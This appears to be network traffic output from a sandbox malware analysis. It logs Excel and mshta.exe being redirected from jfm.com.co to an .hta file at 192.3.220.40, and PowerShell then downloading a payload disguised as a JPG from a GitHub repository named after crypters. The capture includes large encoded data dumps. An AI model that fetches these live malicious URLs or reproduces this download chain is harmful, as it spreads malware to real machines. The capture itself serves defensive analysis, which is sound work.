                                                                                                                                                                              Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                                                                                                                                              Oct 14, 2024 11:06:25.330368042 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                                                                                                                                              Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                                                                                                                                              Oct 14, 2024 11:06:25.330379963 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                                                                                                                                              Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                                                                                                                                              Oct 14, 2024 11:06:25.330393076 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                                                                                                                                              Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                                                                                                                                              Oct 14, 2024 11:06:25.330450058 CEST1236INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                                                                                                                                              Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                                                                                                                                              Oct 14, 2024 11:06:25.330461979 CEST1236INData Raw: 6f 2f 50 77 2f 6a 35 2f 77 39 50 53 2f 44 79 2f 34 37 50 79 2b 7a 70 2f 30 35 50 54 2b 54 69 2f 38 33 50 6b 39 54 53 2f 59 79 50 44 34 44 36 2b 34 74 50 55 37 6a 79 2b 41 73 50 32 36 44 72 2b 49 71 50 59 36 6a 6a 2b 51 6f 50 36 35 44 63 2b 59 6d
                                                                                                                                                                              Data Ascii: o/Pw/j5/w9PS/Dy/47Py+zp/05PT+Ti/83Pk9TS/YyPD4D6+4tPU7jy+AsP26Dr+IqPY6jj+QoP65Dc+YmPc5jU+gkP+4TN+4gPG0z79scPP2TU9QBPYzTy8oLPHyzf7s7Ozuzq7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xP
                                                                                                                                                                              Oct 14, 2024 11:06:25.330473900 CEST1236INData Raw: 35 44 55 2b 67 52 50 41 33 44 73 39 59 61 50 5a 32 7a 6a 39 41 59 50 6d 31 7a 58 39 67 56 50 52 31 6a 48 39 6b 51 50 45 77 7a 38 38 6b 4f 50 4c 7a 7a 72 38 30 4a 50 4c 79 44 66 38 49 67 4f 35 72 6a 30 36 63 6d 4f 41 6c 7a 6d 32 49 74 4e 7a 61 54
                                                                                                                                                                              Data Ascii: 5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPMuDjcwsGMrAAAAAHAEAOAAAwPM/zn/w1PR9DS/QiP+7j9+cpPP6zX+4UPh2DN9QBPlzT38UMP5yjc84FPksDw7U3OstzY700OBtzI7sxOQszB6EvObrDo
                                                                                                                                                                              Oct 14, 2024 11:06:25.330482960 CEST1236INData Raw: 34 51 4f 7a 6e 6a 37 35 6b 65 4f 65 6e 6a 77 35 30 61 4f 4a 6d 44 68 35 38 58 4f 30 6c 44 57 35 51 54 4f 48 6b 6a 41 34 30 50 4f 79 6a 6a 31 34 77 4d 4f 75 69 54 71 34 51 4b 4f 5a 69 54 66 34 4d 48 4f 59 68 7a 55 34 34 45 4f 44 68 7a 4a 34 30 42
                                                                                                                                                                              Data Ascii: 4QOznj75keOenjw50aOJmDh58XO0lDW5QTOHkjA40POyjj14wMOuiTq4QKOZiTf4MHOYhzU44EODhzJ40BOCcT/3g/NtfT03c8Nsezp3I6NXeDZ3A0N7cjN3syNOYj62YrNVaTf2gnNzZDa2YlN0YjJ2ohNLUj81scNDXDr1wZNgVDW1sTN2UTM0wNNXTTx04LN4STs0cINtRTW0EFNFRDK04xM7PT8zw9MLPTqz85MSOTiz82M
                                                                                                                                                                              Oct 14, 2024 11:06:25.330496073 CEST1236INData Raw: 58 54 77 7a 63 69 4d 6d 4c 54 78 79 45 71 4d 61 4b 54 6c 79 55 53 4d 70 42 6a 6d 41 41 41 41 41 42 41 42 41 41 77 50 6d 2f 54 34 2f 49 73 50 47 37 54 70 2b 45 6f 50 36 35 54 64 2b 67 51 50 63 77 44 37 35 41 5a 4f 47 4f 7a 42 79 41 57 4d 77 45 6a
                                                                                                                                                                              Data Ascii: XTwzciMmLTxyEqMaKTlyUSMpBjmAAAAABABAAwPm/T4/IsPG7Tp+EoP65Td+gQPcwD75AZOGOzByAWMwEjCw0OM3AzGAAAAwAwAwDAAA8jw/gaOpljB4QLOwiDr4gKOkiDo4wJOYiDl4AJOMiDi4wWNxODVAAAAwAwAgDAAAYDj2goNEaDg2wnN4ZDd2AXNkXDb1gWNkVDY1wVNYVDV1AFNETDT0gENERDQ0wDN4QDN0AzMnODM
                                                                                                                                                                              Oct 14, 2024 11:06:25.330509901 CEST1236INData Raw: 55 4b 4d 66 43 54 6d 77 4d 4a 4d 4f 43 44 69 77 49 49 4d 38 42 7a 64 77 45 48 4d 72 42 54 5a 77 41 47 4d 61 42 7a 55 77 34 45 4d 4a 42 7a 51 77 30 44 4d 33 41 6a 4d 77 77 43 4d 6d 41 44 49 77 73 42 4d 56 41 7a 44 77 6b 41 4d 45 41 41 41 42 67 45
                                                                                                                                                                              Data Ascii: UKMfCTmwMJMOCDiwIIM8BzdwEHMrBTZwAGMaBzUw4EMJBzQw0DM3AjMwwCMmADIwsBMVAzDwkAMEAAABgEADAGAAAwP+/D+/I/Pt/z5/E+Pb/j1/A9PK/Dx/87P5+zs/06Po+jo/w5PW+Tk/s4PF+zf/o3P09jb/g2Pj9TX/c1PR9DT/Y0PA9jO/UzPv8TK/MyPe8DG/IxPM8zB/EgP67z8+0uPI2To9UBPRzDx80LP3yTs8AKP
                                                                                                                                                                              Oct 14, 2024 11:06:25.335484982 CEST1236INData Raw: 73 7a 41 36 38 76 4f 37 72 7a 39 36 4d 76 4f 6a 72 6a 7a 36 77 72 4f 79 71 44 71 36 77 6f 4f 39 70 6a 62 36 63 6d 4f 64 70 7a 55 36 6b 6b 4f 2f 6f 54 4e 36 49 51 4f 70 6e 7a 30 35 6f 62 4f 7a 6d 7a 70 35 41 61 4f 5a 6d 7a 62 35 55 57 4f 65 6c 7a
                                                                                                                                                                              Data Ascii: szA68vO7rz96MvOjrjz6wrOyqDq6woO9pjb6cmOdpzU6kkO/oTN6IQOpnz05obOzmzp5AaOZmzb5UWOelzV5AVOJlTF5sQOEgDz4UMOnizi4oHAAAAcAIAgAAAA5MbOsmDo5kZOOmzh58XOtlTX5YVOKlzQ5UTOukjJ5QROEgT/4EPOqjD34UNONjzu4sKOkiDm4EJODiDf4QHOidDs3M6NVejg3M3N/cTM3AyNLYzu24qNgaTj


                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.2249161150.136.81.2484433184C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-14 09:05:43 UTC422OUTGET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                              Host: jfm.com.co
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-14 09:05:43 UTC451INHTTP/1.1 302 Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:05:43 GMT
                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                              Content-Length: 89
                                                                                                                                                                              Connection: close
                                                                                                                                                                              X-DNS-Prefetch-Control: off
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                              X-Download-Options: noopen
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                              Location: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta
                                                                                                                                                                              Vary: Accept
                                                                                                                                                                              2024-10-14 09:05:43 UTC89INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 34 35 30 2f 65 63 2f 6e 65 74 77 6f 72 6b 74 68 69 6e 6b 69 6e 67 67 72 65 61 74 74 68 69 6e 67 73 74 6f 62 65 65 6e 6f 75 67 68 2e 68 74 61
                                                                                                                                                                              Data Ascii: Found. Redirecting to http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.2249163150.136.81.2484433456C:\Windows\System32\mshta.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-14 09:05:45 UTC446OUTGET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Accept-Language: fr-FR
                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                              Host: jfm.com.co
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-14 09:05:45 UTC451INHTTP/1.1 302 Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:05:45 GMT
                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                              Content-Length: 89
                                                                                                                                                                              Connection: close
                                                                                                                                                                              X-DNS-Prefetch-Control: off
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                              X-Download-Options: noopen
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                              Location: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta
                                                                                                                                                                              Vary: Accept
                                                                                                                                                                              2024-10-14 09:05:45 UTC89INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 34 35 30 2f 65 63 2f 6e 65 74 77 6f 72 6b 74 68 69 6e 6b 69 6e 67 67 72 65 61 74 74 68 69 6e 67 73 74 6f 62 65 65 6e 6f 75 67 68 2e 68 74 61
                                                                                                                                                                              Data Ascii: Found. Redirecting to http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.2249166150.136.81.2484433184C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-14 09:06:03 UTC422OUTGET /k3l?&alloy=handsome&convection=panicky&acid=giddy&position=absorbing&regular=orange&database=cuddly&squid HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                              Host: jfm.com.co
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-14 09:06:03 UTC451INHTTP/1.1 302 Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:06:03 GMT
                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                              Content-Length: 89
                                                                                                                                                                              Connection: close
                                                                                                                                                                              X-DNS-Prefetch-Control: off
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                              X-Download-Options: noopen
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                              Location: http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta
                                                                                                                                                                              Vary: Accept
                                                                                                                                                                              2024-10-14 09:06:03 UTC89INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 34 30 2f 34 35 30 2f 65 63 2f 6e 65 74 77 6f 72 6b 74 68 69 6e 6b 69 6e 67 67 72 65 61 74 74 68 69 6e 67 73 74 6f 62 65 65 6e 6f 75 67 68 2e 68 74 61
                                                                                                                                                                              Data Ascii: Found. Redirecting to http://192.3.220.40/450/ec/networkthinkinggreatthingstobeenough.hta


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.2249167185.199.108.1334433996C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-10-14 09:06:03 UTC134OUTGET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1
                                                                                                                                                                              Host: raw.githubusercontent.com
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              2024-10-14 09:06:03 UTC903INHTTP/1.1 200 OK
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Length: 6331693
                                                                                                                                                                              Cache-Control: max-age=300
                                                                                                                                                                              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                              ETag: "c7af5123730da5215a9032249afad007dd54a2bf216bbf720e484463b4eebacd"
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-Frame-Options: deny
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              X-GitHub-Request-Id: 0C07:2DA33E:146EACB:16903B7:670CD329
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:06:03 GMT
                                                                                                                                                                              Via: 1.1 varnish
                                                                                                                                                                              X-Served-By: cache-nyc-kteb1890060-NYC
                                                                                                                                                                              X-Cache: HIT
                                                                                                                                                                              X-Cache-Hits: 0
                                                                                                                                                                              X-Timer: S1728896764.822353,VS0,VE47
                                                                                                                                                                              Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                              X-Fastly-Request-ID: 113a39df19d55a8d93304a65939dc97222b544fb
                                                                                                                                                                              Expires: Mon, 14 Oct 2024 09:11:03 GMT
                                                                                                                                                                              Source-Age: 0
                                                                                                                                                                              2024-10-14 09:06:03 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                              2024-10-14 09:06:03 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                                                                                                                                              Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                                                                                                                                              2024-10-14 09:06:03 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                                                                                                                                              Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                                                                                                                                              2024-10-14 09:06:03 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                                                                                                                                              Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                                                                                                                                              2024-10-14 09:06:03 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                                                                                                                                              Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                                                                                                                                              2024-10-14 09:06:03 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                                                                                                                                              Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
